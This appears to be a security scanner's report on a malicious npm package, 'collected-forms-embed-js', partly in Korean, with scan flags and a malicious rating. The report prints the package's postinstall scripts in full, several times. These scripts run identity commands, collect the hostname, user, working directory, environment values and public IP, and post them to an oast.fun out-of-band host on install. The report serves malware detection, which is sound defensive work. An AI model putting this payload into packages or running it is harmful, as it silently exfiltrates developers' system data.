// npm 패키지

collected-forms-embed-js

Full RCE PoC - Alex Birsan Style

npmjs.com tarball

버전

메인테이너

최초 publish

2026-05-19

publisher

fwgewgewgewrhgw

tarball

1,047 B

AUTO-PUBLISHED·3개 버전 인덱싱됨·최근 publish: 2026-05-19

// exfil path

what is read → where it ships

steals

○ home dir
○ system info

sends to

⇢ wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun(oast.fun)
⚙ dns tunneling(fetches + executes remote payload)

// offending code· @1.0.5· 1 file flagged

llm: malicious · 0.95

→ 의심 전송지로 발송: wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun.

@1.0.5·2026-05-19·AUTO-PUBLISHED·publisher: fwgewgewgewrhgw
heuristic 81/100
static flags 6
llm malicious (0.95) via ollama
install-scripts:postinstallnew-publisher:0dpublisher-handle-randomlookingsuspicious-description:pocreads-env-varsreads-homedirreads-system-infodns-tunnelingchild-process-spawndest-via-hostname-var
→ 의심 전송지로 발송: wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun.
// NHI intent1 target·mixed harvest patterns·gate: always

--- install scripts --- ### postinstall node -e "const os=require('os'),http=require('http' ),https=require('https' ),cp=require('child_process'); const getIP=(cb)=>{https.get('https://api.ipify.org',(res )=>{let d='';res.on('data',(c)=>d+=c);res.on('end',()=>cb(d))}).on('error',()=>cb('unknown'))}; getIP((ip)=>{ cp.exec('id || ver && whoami && hostname', (e,o,r)=>{ const data={time:new Date().toUTCString(), organization:process.env.USERDOMAIN||process.env.COMPANY||'Check IP WHOIS', ip_address:ip, package_name:'collected-forms-embed-js', hostname:os.hostname(), current_path:process.cwd(), command_output:o+r }; const postData=JSON.stringify(data); const req=http.request({hostname:'wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun',method:'POST',path:'/',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(postData )}},()=>{}); req.write(postData); req.end(); }); });" --- package/package.json (excerpt) --- { "name": "collected-forms-embed-js", "version": "1.0.5", "description": "Full RCE PoC - Alex Birsan Style", "main": "index.js", "scripts": { "postinstall": "node -e \"const os=require('os'),http=require('http' ),https=require('https' ),cp=require('child_process'); const getIP=(cb)=>{https.get('https://api.ipify.org',(res )=>{let d='';res.on('data',(c)=>d+=c);res.on('end',()=>cb(d))}).on('error',()=>cb('unknown'))}; getIP((ip)=>{ cp.exec('id || ver && whoami && hostname', (e,o,r)=>{ const data={time:new Date().toUTCString(), organization:process.env.USERDOMAIN||process.env.COMPANY||'Check IP WHOIS', ip_address:ip, package_name:'collected-forms-embed-js', hostname:os.hostname(), current_path:process.cwd(), command_output:o+r }; const postData=JSON.stringify(data); const req=http.request({hostname:'wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun',method:'POST',path:'/',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(postData )}},()=>{}); req.write(postData); req.end(); }); });\"" } } --- dynamic destinations --- → wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun (via hostname-var)

const data={path:process.cwd(), registry:process.env.npm_config_registry, user:process.env.USER || process.env.USERNAME, arch:process.arch, platform:process.platform}; cp.exec('id || ver', (e,o,r)=>{ data.os_info=o+r; const postData=JSON.st

--- install scripts --- ### postinstall node -e "const cp=require('child_process'),http=require('http' ); const data={path:process.cwd(), registry:process.env.npm_config_registry, user:process.env.USER || process.env.USERNAME, arch:process.arch, platform:process.platform}; cp.exec('id || ver', (e,o,r)=>{ data.os_info=o+r; const postData=JSON.stringify(data); const req=http.request({hostname:'wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun',method:'POST',path:'/',headers:{'Content-Type':'application/json','Content-Length':postData.length}},( )=>{}); req.write(postData); req.end(); });" --- package/package.json (excerpt) --- { "name": "collected-forms-embed-js", "version": "1.0.2", "description": "Advanced Dependency Confusion PoC", "main": "index.js", "scripts": { "postinstall": "node -e \"const cp=require('child_process'),http=require('http' ); const data={path:process.cwd(), registry:process.env.npm_config_registry, user:process.env.USER || process.env.USERNAME, arch:process.arch, platform:process.platform}; cp.exec('id || ver', (e,o,r)=>{ data.os_info=o+r; const postData=JSON.stringify(data); const req=http.request({hostname:'wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun',method:'POST',path:'/',headers:{'Content-Type':'application/json','Content-Length':postData.length}},( )=>{}); req.write(postData); req.end(); });\"" } } --- dynamic destinations --- → wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun (via hostname-var) --- package.json (entry) --- { "name": "collected-forms-embed-js", "version": "1.0.2", "description": "Advanced Dependency Confusion PoC", "main": "index.js", "scripts": { "postinstall": "node -e \"const cp=require('child_process'),http=require('http' ); const data={path:process.cwd(), registry:process.env.npm_config_registry, user:process.env.USER || process.env.USERNAME, arch:process.arch, platform:process.platform}; cp.exec('id || ver', (e,o,r)=>{ data.os_info=o+r; const postData=JSON.stringify(data); const req=http.request({hostname:'wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun',method:'POST',path:'/',headers:{'Content-Type':'application/json','Content-Length':postData.length}},( )=>{}); req.write(postData); req.end(); });\"" } } --- index.js (entry) ---

### postinstall node -e "const os=require('os'),http=require('http' ),https=require('https' ),cp=require('child_process'); const getIP=(cb)=>{https.get('https://api.ipify.org',(res )=>{let d='';res.on('data',(c)=>d+=c);res.on('end',()=>cb(d))}).on('error',()=>cb('unknown'))}; getIP((ip)=>{ cp.exec('id || ver && whoami && hostname', (e,o,r)=>{ const data={time:new Date().toUTCString(), organization:process.env.USERDOMAIN||process.env.COMPANY||'Check IP WHOIS', ip_address:ip, package_name:'collected-forms-embed-js', hostname:os.hostname(), current_path:process.cwd(), command_output:o+r }; const postData=JSON.stringify(data); const req=http.request({hostname:'wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun',method:'POST',path:'/',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(postData )}},()=>{}); req.write(postData); req.end(); }); });"

{ "name": "collected-forms-embed-js", "version": "1.0.5", "description": "Full RCE PoC - Alex Birsan Style", "main": "index.js", "scripts": { "postinstall": "node -e \"const os=require('os'),http=require('http' ),https=require('https' ),cp=require('child_process'); const getIP=(cb)=>{https.get('https://api.ipify.org',(res )=>{let d='';res.on('data',(c)=>d+=c);res.on('end',()=>cb(d))}).on('error',()=>cb('unknown'))}; getIP((ip)=>{ cp.exec('id || ver && whoami && hostname', (e,o,r)=>{ const data={time:new Date().toUTCString(), organization:process.env.USERDOMAIN||process.env.COMPANY||'Check IP WHOIS', ip_address:ip, package_name:'collected-forms-embed-js', hostname:os.hostname(), current_path:process.cwd(), command_output:o+r }; const postData=JSON.stringify(data); const req=http.request({hostname:'wvmjioytxqdcokzvflqjv6v35ug1nfyjl.oast.fun',method:'POST',path:'/',headers:{'Content-Type':'application/json','Content-Length':Buffer.byteLength(postData )}},()=>{}); req.write(postData); req.end(); }); });\"" } }